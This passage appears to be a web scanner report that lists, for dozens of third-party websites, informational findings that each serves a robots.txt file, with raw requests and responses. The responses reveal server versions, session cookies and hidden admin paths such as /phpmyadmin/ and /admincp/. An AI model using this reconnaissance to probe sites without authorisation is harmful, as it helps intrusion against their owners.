HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:26:57 GMT
Server: Apache/1.3.27 (Unix)
Last-Modified: Thu, 21 Apr 2011 00:58:42 GMT
ETag: "85a59b-6b-4daf8142"
Accept-Ranges: bytes
Content-Length: 107
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: Googlebot
Allow: /
User-agent: msnbot
Allow:
User-agent: bingbot
Allow:
User-agent: *
Allow:

27.496. http://www.eatatjacks.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eatatjacks.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.eatatjacks.com

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 01:20:33 GMT
Server: Apache
X-Pingback: http://www.eatatjacks.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Set-Cookie: PHPSESSID=ogg74poiioucqkqnuiikm2qci4; path=/
Cache-Control: max-age=3600
Expires: Wed, 04 May 2011 02:20:33 GMT
Vary: User-Agent,Accept-Encoding
Content-Length: 75
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://www.eatatjacks.com/sitemap.xml.gz

27.497. http://www.ebay.be/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebay.be
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ebay.be

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/plain;charset=ISO-8859-1
Content-Length: 619
Date: Wed, 04 May 2011 03:19:03 GMT
Connection: Keep-Alive

### BEGIN FILE ###
#
# allow-all
#
#
# The use of robots or other automated means to access the eBay site
# without the express permission of eBay is strictly prohibited.
# Notwithstanding the foregoi
...[SNIP]...

27.498. http://www.ebindr.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebindr.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ebindr.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:53:08 GMT
Server: Apache
Last-Modified: Fri, 05 Oct 2007 15:16:33 GMT
ETag: "cf8034-1c-43bc063533640"
Accept-Ranges: bytes
Content-Length: 28
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

27.499. http://www.ecademy.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ecademy.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ecademy.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:16:30 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 04 Mar 2009 08:32:26 GMT
ETag: "71c339-182e-46446e434da80"
Accept-Ranges: bytes
Content-Length: 6190
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: Googlebot
Disallow: /*&tag=*
Disallow: /*op=locayta*
Disallow: /*op=solr*

User-agent: Mediapartners-Google*
Disallow: /*&tag=*
Disallow: /*op=locayta*
Disallow: /*op=solr*

User-agent: G
...[SNIP]...

27.500. http://www.echo.msk.ru/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.echo.msk.ru
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.echo.msk.ru

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Wed, 04 May 2011 01:53:51 GMT
Content-Type: text/plain; charset=utf-8
Connection: close
Accept-Ranges: bytes
Content-Length: 204

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file
#
# To ban all spiders from the entire site uncomment the next two lines:
# User-Agent: *
# Disallow
...[SNIP]...

27.501. http://www.eclipsedvdreleasedate.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eclipsedvdreleasedate.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.eclipsedvdreleasedate.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:59:17 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.15
X-Pingback: http://eclipsedvdreleasedate.com/xmlrpc.php
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://eclipsedvdreleasedate.com/sitemap.xml.gz

27.502. http://www.ed2010.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ed2010.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ed2010.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:09:55 GMT
Server: Apache
Last-Modified: Mon, 14 Mar 2011 23:26:29 GMT
ETag: "fc726f-691-49e79a4349da5"
Accept-Ranges: bytes
Content-Length: 1681
Connection: close
Content-Type: text/plain

# $Id: robots.txt,v 1.7.2.1 2007/03/23 18:57:07 drumm Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by site
...[SNIP]...

27.503. http://www.edgarsnyder.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.edgarsnyder.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.edgarsnyder.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:26:17 GMT
Server: Apache/1.3.35 (Unix) mod_gzip/1.3.26.1a FrontPage/5.0.2.2635 mod_perl/1.29 mod_ssl/2.8.26 OpenSSL/0.9.7c
Vary: *
Last-Modified: Tue, 08 Mar 2011 14:01:53 GMT
ETag: "153740-11a-4d7636d1"
Accept-Ranges: bytes
Content-Length: 282
Connection: close
Content-Type: text/plain

Sitemap: http://www.edgarsnyder.com/esa-sitemap.xml
Sitemap: http://www.edgarsnyder.com/esa-news-sitemap.xml
Sitemap: http://www.edgarsnyder.com/esa-rss-sitemap.xml

User-agent: *
Disallow: /esa/
Disa
...[SNIP]...

27.504. http://www.edn.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.edn.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.edn.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:04:47 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 23 Jul 2010 03:02:59 GMT
ETag: "298642-53a-48c0545b41ec0"
Accept-Ranges: bytes
Content-Length: 1338
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /404.php
Disallow: /css/
Disallow: /js/
Disallow: /scripts/
Disallow: /search/
Disallow: /subscribe/
Disallow: /article/*-full.php
Disallow: /article/print/
Disallow: /articl
...[SNIP]...

27.505. http://www.edu-info.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.edu-info.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.edu-info.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:57:18 GMT
Server: Apache/2.0.52 (CentOS)
Last-Modified: Wed, 17 Sep 2008 19:47:41 GMT
ETag: "34be8-268-bdbfb140"
Accept-Ranges: bytes
Content-Length: 616
Connection: close
Content-Type: text/plain; charset=UTF-8

# robots, scram
User-agent: Googlebot
Disallow:
User-agent: Googlebot-Image
Disallow: /
User-agent: MSNBot
Disallow:
Crawl-delay: 2
User-agent: Slurp
Disallow:
User-agent: Teoma
Disallow:
User-age
...[SNIP]...

27.506. http://www.educationalrap.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.educationalrap.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.educationalrap.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:43:14 GMT
Server: Apache
Last-Modified: Wed, 21 Oct 2009 20:45:31 GMT
Accept-Ranges: bytes
Content-Length: 186
Cache-Control: public, must-revalidate, proxy-revalidate
Expires: Wed, 04 May 2011 06:43:14 GMT
Vary: Accept-Encoding,User-Agent
Pragma: public
X-Powered-By: W3 Total Cache/0.9.1.3
Connection: close
Content-Type: text/plain

User-Agent: *
Allow: /
Disallow: /old_site
Disallow: /music_files
Disallow: /wp
# BEGIN XML-SITEMAP-PLUGIN
Sitemap: http://www.educationalrap.com/sitemap.xml.gz
# END XML-SITEMAP-PLUGIN

27.507. http://www.educause.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.educause.edu
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.educause.edu

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Length: 1651
Content-Type: text/plain
Last-Modified: Wed, 13 Oct 2010 18:45:02 GMT
Accept-Ranges: bytes
ETag: "d1bc7dbe66bcb1:351b"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:53:41 GMT
Connection: close

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by
...[SNIP]...

27.508. http://www.eftuniverse.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eftuniverse.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.eftuniverse.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:29:22 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 13 Oct 2010 13:57:12 GMT
ETag: "e013962-130-4927ff85a1e00"
Accept-Ranges: bytes
Content-Length: 304
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /
...[SNIP]...

27.509. http://www.ehawaii.gov/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ehawaii.gov
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ehawaii.gov

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:08:09 GMT
Server: Apache
Last-Modified: Fri, 08 Jun 2007 00:02:54 GMT
ETag: "9469-5a-c0be0780"
Accept-Ranges: bytes
Content-Length: 90
Content-Type: text/plain
Connection: close

# mail sysadmin@ehawaii.gov

User-agent: *
Disallow: /tmp
Disallow: /conf
Disallow: /logs

27.510. http://www.elabs3.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.elabs3.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.elabs3.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:12:12 GMT
Server: Apache
Last-Modified: Fri, 22 Apr 2011 20:13:46 GMT
ETag: "2c-7ebfd280"
Accept-Ranges: bytes
Content-Length: 44
Connection: close
Content-Type: text/plain

User-agent: *
Crawl-Delay: 6000
Disallow: /

27.511. http://www.electroluxappliances.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.electroluxappliances.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.electroluxappliances.com

Response

HTTP/1.0 200 OK
Content-Length: 505
Content-Type: text/plain
Content-Location: http://www.electroluxappliances.com/robots.txt
Last-Modified: Mon, 07 Feb 2011 15:19:49 GMT
Accept-Ranges: bytes
ETag: "74224376dac6cb1:28ef7"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:07:54 GMT
Connection: close

User-agent: Googlebot-Mobile
Disallow: /
Crawl-delay: 10
Sitemap: http://m.electroluxappliances.com/sitemap.xml

User-agent: YahooSeeker/M1A1-R2D2
Disallow: /
Crawl-delay: 10
Sitemap: http://m
...[SNIP]...

27.512. http://www.ellenskitchen.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ellenskitchen.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ellenskitchen.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:35:49 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Wed, 26 May 2010 11:18:26 GMT
ETag: "748bb4-96-6ec66480"
Accept-Ranges: bytes
Content-Length: 150
Cache-Control: max-age=300
Expires: Wed, 04 May 2011 01:40:49 GMT
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: /temp/
Disallow: /ftp/
Disallow: /cgi-bin/
Disallow: /stats/
Disallow: /admin/
Disallow: /test/
Disallow: /outofway/
Allow: /

27.513. http://www.elnorte.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.elnorte.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.elnorte.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 98
Content-Type: text/plain
Last-Modified: Tue, 31 Aug 2010 15:15:12 GMT
Accept-Ranges: bytes
ETag: "2d4cd4e1f49cb1:66654"
p3p: CP="NOI CURa ADMa DEVa OUR IND UNI NAV INT"
X-Powered-By: ASP.NET
Server: 8021
Date: Wed, 04 May 2011 03:17:58 GMT
Connection: close
X-Robots-Tag: noarchive
X-UA-Compatible: IE=EmulateIE7

User-agent: *
Disallow: /*comentarios.xml$
Sitemap: http://www.elnorte.com/sitemap_elnorte.xml

27.514. http://www.elsaelsa.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.elsaelsa.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.elsaelsa.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:27:27 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 05 Jan 2010 09:42:11 GMT
Accept-Ranges: bytes
Content-Length: 184
Vary: Accept-Encoding,User-Agent
X-Powered-By: W3 Total Cache/0.9.1.3
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

User-agent: kame

Disallow: /

# BEGIN XML-SITEMAP-PLUGIN
Sitemap: http://www.elsaelsa.com/sitemap.xml.gz

# END XML-SITEMAP-PLUGIN


# End robots.txt file

27.515. http://www.email-hsn.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.email-hsn.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.email-hsn.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:07:19 GMT
Server: Apache
Last-Modified: Mon, 07 Mar 2005 15:39:24 GMT
ETag: "505a0-1a-422c75ac"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: /

27.516. http://www.emailsparkle.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.emailsparkle.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.emailsparkle.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Mon, 24 Jan 2011 09:05:36 GMT
ETag: "80bd0dda5bbcb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 1296
Date: Wed, 04 May 2011 01:50:43 GMT
X-Varnish: 1246283821
Age: 0
Via: 1.1 varnish
Connection: close

# robots.txt Unified version for GraphicMail.


User-agent: *
Disallow: /site/signup.aspx
Disallow: /site/signup_additional_services.aspx
Disallow: /site/signup_payment.aspx
Disallow: /site/signup_pay
...[SNIP]...

27.517. http://www.ember-reigns.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ember-reigns.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ember-reigns.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:43:59 GMT
Server: Apache
Last-Modified: Mon, 29 Mar 2010 21:18:06 GMT
ETag: "e536a-31-482f70c8ddf80"
Accept-Ranges: bytes
Content-Length: 49
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: Ninja 7.0
Disallow: Ninja

27.518. http://www.embroiderydesigns.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.embroiderydesigns.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.embroiderydesigns.com

Response

HTTP/1.1 200 OK
ETag: "12cf4766f3f5cb1:12b9"
Accept-Ranges: bytes
Set-Cookie: X-Mapping-aobfoppo=41C4A900AEDAF6F578A009DDA4E3ADB5; path=/
Content-Length: 6562
Date: Wed, 04 May 2011 00:20:52 GMT
Connection: close
Last-Modified: Fri, 08 Apr 2011 13:46:45 GMT
X-Strangeloop: RCache
Server: Microsoft-IIS/6.0
X-SL-RCache: Cached
X-Powered-By: ASP.NET
Content-Type: text/plain

User-agent: sitebot
Disallow: /
User-agent: dotbot
Disallow: /
User-agent: Titan
Disallow: /
User-agent: EmailCollector
Disallow: /
User-agent: EmailSiphon
Disallow: /
User-agent: EmailWolf
...[SNIP]...

27.519. http://www.emedco.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.emedco.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.emedco.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:16:08 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Sat, 25 Sep 2010 07:35:49 GMT
ETag: "2b9-491108b467f40"
Accept-Ranges: bytes
Content-Length: 697
Vary: Accept-Encoding,User-Agent
Zeon-Cluster: EMEDCOWEB02
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /partnumberlookup/
Disallow: /dyopreview/
Disallow: /ipcpreview/
Disallow: /Import-Tool/
Disallow: /deploy/
Disallow: /downloader/
Disallow: /fontis/
Disallow: /includ
...[SNIP]...

27.520. http://www.emmas-free-slots.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.emmas-free-slots.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.emmas-free-slots.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:58:57 GMT
Server: Apache
X-Pingback: http://www.emmas-free-slots.com/xmlrpc.php
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://www.emmas-free-slots.com/sitemap.xml.gz

27.521. http://www.emudesc.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.emudesc.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.emudesc.net

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 04 May 2011 00:45:02 GMT
Content-Type: text/plain
Content-Length: 1159
Last-Modified: Thu, 04 Mar 2010 23:02:26 GMT
Connection: close
Accept-Ranges: bytes

User-agent: Mediapartners-Google*
Disallow:

User-agent: *
Disallow: /wp-admin
Disallow: /wp-login.php
Disallow: /*/feed
Disallow: /*/trackback
Disallow: /foros/ajax.php
Disallow: /foros/attachment.ph
...[SNIP]...

27.522. http://www.endlesssimmer.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.endlesssimmer.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.endlesssimmer.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:26:16 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
X-Pingback: http://www.endlesssimmer.com/xmlrpc.php
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:
Sitemap: http://www.endlesssimmer.com/sitemap.xml.gz

27.523. http://www.enewsbuilder.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.enewsbuilder.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.enewsbuilder.net

Response

HTTP/1.1 200 OK
Content-Length: 3734
Content-Type: text/plain
Last-Modified: Wed, 01 Dec 2010 21:27:32 GMT
Accept-Ranges: bytes
ETag: "80927d909e91cb1:7eaa1"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:03:12 GMT
Connection: close

User-agent: Slurp
Crawl-delay: 5
Disallow: /imn/
Disallow: /private/
Disallow: /STATProc/
Disallow: /status/
Disallow: /avnet_teamtalk/
Disallow: /avnetts-employee/
Disallow: /aruba_networks/
...[SNIP]...

27.524. http://www.englishplus.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.englishplus.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.englishplus.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:06:43 GMT
Content-Type: text/plain
Connection: close
Server: Apache/Nginx/Varnish
Last-Modified: Fri, 04 Oct 2002 00:26:59 GMT
ETag: "24d13d3-135-3ac22fdea7ac0"
Cache-Control: max-age=14400, public
Expires: Wed, 04 May 2011 05:58:59 GMT
Content-Length: 309
Age: 464

#Keeps spiders out of certain files or folders
User-agent: *
Disallow: license.htm
Disallow: emailus.htm
Disallow: /cgibin/
Disallow: /packets/
Disallow: /logs/
Disallow: .domains
Disallow: .domains.b
...[SNIP]...

27.525. http://www.enworld.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.enworld.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.enworld.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:52:50 GMT
Server: Apache
Last-Modified: Sun, 23 Jan 2011 02:19:17 GMT
ETag: "1ca12c-44e-49a7a1c389340"
Accept-Ranges: bytes
Content-Length: 1102
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /forumdev/
Disallow: /phpmyadmin/
Disallow: /phpmyadmin.backup/
Disallow: /test/
Disallow: /testcurrent/
Disallow: /admincp/
Disallow: /forum/admincp/
Disallow: /forum/announce
...[SNIP]...

27.526. http://www.epfl.ch/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.epfl.ch
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.epfl.ch

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:59:39 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 03 Nov 2010 11:01:46 GMT
ETag: "274729-22"
Accept-Ranges: bytes
Content-Length: 34
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-Agent: *
Disallow: /cgi-bin/

27.527. http://www.epltalk.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.epltalk.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.epltalk.com

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Date: Wed, 04 May 2011 03:22:23 GMT
Content-Type: text/plain; charset=utf-8
Connection: close
Set-Cookie: sid=187256549c38a9d63846764dd3b11437; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Cookie,Accept-Encoding,User-Agent
X-Pingback: http://www.epltalk.com/xmlrpc.php

User-agent: *
Disallow:

Sitemap: http://www.epltalk.com/sitemap.xml.gz

27.528. http://www.erate.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.erate.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.erate.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: text/html; charset=UTF-8
Date: Wed, 04 May 2011 03:03:09 GMT
Connection: close
Set-Cookie: X-Mapping-akhokmek=8BB131CD3CF7419E500A9B2BD7C1B47E; path=/

User-agent: *
Disallow:
Disallow: /widgets/

user-agent: Googlebot

Disallow: /refinance_rates/Alabama/fha/30_year_fixed.html?
Disallow: /refinance_rates/Alaska/fha/30_year_fixed.html?
Disallow: /ref
...[SNIP]...

27.529. http://www.ericas.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ericas.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ericas.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:32:24 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0c
Last-Modified: Fri, 04 Jan 2008 21:41:40 GMT
ETag: "34a060-db-442ec602b2d00"
Accept-Ranges: bytes
Content-Length: 219
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

# Beginning of File: robots.txt
# mail webmaster@ericas.com
# http://www.ericas.com
User-agent: *
Disallow: /temp/
Disallow: /signup/
Disallow: My_Account.html
Disallow: EditCart.html
# End of
...[SNIP]...

27.530. http://www.ericksonliving.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ericksonliving.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ericksonliving.com

Response

HTTP/1.1 200 OK
Content-Length: 2142
Content-Type: text/plain
Last-Modified: Tue, 28 Dec 2010 17:31:36 GMT
Accept-Ranges: bytes
ETag: "2ac1c813b5a6cb1:530"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 04:51:13 GMT
Connection: close

User-agent: *
Disallow: /aspnet_client/
Disallow: /Templates/
Disallow: /ourcommunities/illinoisCommunities.asp
Disallow: /ourcommunities/hfv/
Disallow: /ourcommunities/hfv/hfv_apartmenthomes.asp
...[SNIP]...

27.531. http://www.esa.int/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.esa.int
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.esa.int

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:41:03 GMT
Server: PWS/1.7.2.1
X-Px: ms iad-agg-n18 ( iad-agg-n6), rf-ht iad-agg-n6 ( cdg-agg-n14), ht mad-agg-n2.panthercdn.com
ETag: "f9b34-10ce-43ecae546bdc0"
Cache-Control: max-age=600
Expires: Wed, 04 May 2011 03:51:03 GMT
Age: 0
Content-Length: 4302
Content-Type: text/plain
Last-Modified: Tue, 13 Nov 2007 08:04:17 GMT
Connection: close

# File to exclude robots from the access to the Web Portal
# Template has been taken from www.html.it

User-agent: Microsoft URL
Disallow: /

User-agent: webmirror
Disallow: /

User-agent: webcopy
Dis
...[SNIP]...

27.532. http://www.esato.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.esato.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.esato.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:10:30 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 21:08:06 GMT
ETag: "1134005e-759-48b879d7e7980"
Accept-Ranges: bytes
Content-Length: 1881
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/
Disallow: /logo/
Disallow: /logos/search/
Disallow: /submit/
Disallow: /phill/
Disallow: /board/bookmarks.php
Disallow: /board/bb_profile.php
Disallow: /board/sendpms
...[SNIP]...

27.533. http://www.etftrends.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.etftrends.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.etftrends.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:10:06 GMT
Server: Apache
Last-Modified: Sun, 15 Aug 2010 20:18:50 GMT
ETag: "1a14c07-19f-48de26c8abe80"
Accept-Ranges: bytes
Content-Length: 415
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /pro-content/
Disallow: /_css/
Disallow: /_images/
Disallow: /_includes/
Disallow: /_js/
Disallow: /bugs/
Disallow: /etf_data/
Disallow: /etfpub1/
Disallow: /etfpub2/
Disallow:
...[SNIP]...

